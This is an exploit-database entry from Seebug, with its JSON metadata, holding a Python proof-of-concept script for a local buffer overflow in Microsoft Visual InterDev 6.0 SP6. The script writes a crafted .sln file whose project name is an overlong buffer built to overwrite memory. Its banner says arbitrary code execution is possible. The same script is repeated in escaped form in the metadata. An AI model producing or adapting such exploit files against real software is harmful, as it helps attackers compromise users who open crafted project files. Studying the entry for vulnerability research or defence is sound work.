ID SSV:8256
Type seebug
Reporter Root
Modified 2008-04-05T00:00:00
Description
No description provided by source.
#usage: exploit.py FileName
import sys
print "--------------------------------------------------------------------------------"
print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Execution of arbitrary code is possible, but it annoys me at the moment :)"
print "--------------------------------------------------------------------------------"
buff = "a" * 264 + "bbbb" + "c" * 256
try:
sln_file = \
'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\
'Project("{}") = "' + buff + '"\n'+\
'EndProject\n'
out_file = open(sys.argv[1] + ".sln",'w')
out_file.write(sln_file)
out_file.close()
print "\nFILE CREATION COMPLETED!\n"
except:
print " \n -------------------------------------"
print " Usage: exploit.py FileName"
print " -------------------------------------"
print "\nAN ERROR OCCURS DURING FILE CREATION!"
{"href": "https://www.seebug.org/vuldb/ssvid-8256", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-04-05T00:00:00", "title": "Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-8256", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2008-04-05T00:00:00", "sourceData": "\n #usage:\u00a0exploit.py\u00a0FileName\r\n\r\nimport\u00a0sys\r\n\r\nprint\u00a0"--------------------------------------------------------------------------------"\r\nprint\u00a0'\u00a0[PoC\u00a02]\u00a0Microsoft\u00a0Visual\u00a0InterDev\u00a06.0\u00a0(SP6)\u00a0".sln"\u00a0files\u00a0Local\u00a0Buffer\u00a0Overflow'\r\nprint\u00a0"\u00a0author:\u00a0shinnai"\r\nprint\u00a0"\u00a0mail:\u00a0shinnai[at]autistici[dot]org"\r\nprint\u00a0"\u00a0site:\u00a0http://shinnai.altervista.org\\n"\r\nprint\u00a0"\u00a0Execution\u00a0of\u00a0arbitrary\u00a0code\u00a0is\u00a0possible,\u00a0but\u00a0it\u00a0annoys\u00a0me\u00a0at\u00a0the\u00a0moment\u00a0:)"\r\nprint\u00a0"--------------------------------------------------------------------------------"\r\n\r\nbuff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0"a"\u00a0*\u00a0264\u00a0+\u00a0"bbbb"\u00a0+\u00a0"c"\u00a0*\u00a0256\r\n\r\ntry:\r\n\u00a0\u00a0\u00a0\u00a0sln_file\u00a0=\u00a0\\\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0'Microsoft\u00a0Visual\u00a0Studio\u00a0Solution\u00a0File,\u00a0Format\u00a0Version\u00a01.00\\n'+\\\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0'Project("{}")\u00a0=\u00a0"'\u00a0+\u00a0buff\u00a0+\u00a0'"\\n'+\\\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0'EndProject\\n'\r\n\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0out_file\u00a0=\u00a0open(sys.argv[1]\u00a0+\u00a0".sln",'w')\r\n\u00a0\u00a0\u00a0\u00a0out_file.write(sln_file)\r\n\u00a0\u00a0\u00a0\u00a0out_file.close()\r\n\u00a0\u00a0\u00a0\u00a0print\u00a0"\\nFILE\u00a0CREATION\u00a0COMPLETED!\\n"\r\nexcept:\r\n\u00a0\u00a0\u00a0\u00a0print\u00a0"\u00a0\\n\u00a0-------------------------------------"\r\n\u00a0\u00a0\u00a0\u00a0print\u00a0"\u00a0\u00a0Usage:\u00a0exploit.py\u00a0FileName"\r\n\u00a0\u00a0\u00a0\u00a0print\u00a0"\u00a0-------------------------------------"\r\n\u00a0\u00a0\u00a0\u00a0print\u00a0"\\nAN\u00a0ERROR\u00a0OCCURS\u00a0DURING\u00a0FILE\u00a0CREATION!"\n ", "id": "SSV:8256", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:44:25", "reporter": "Root", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645564671}}
{}
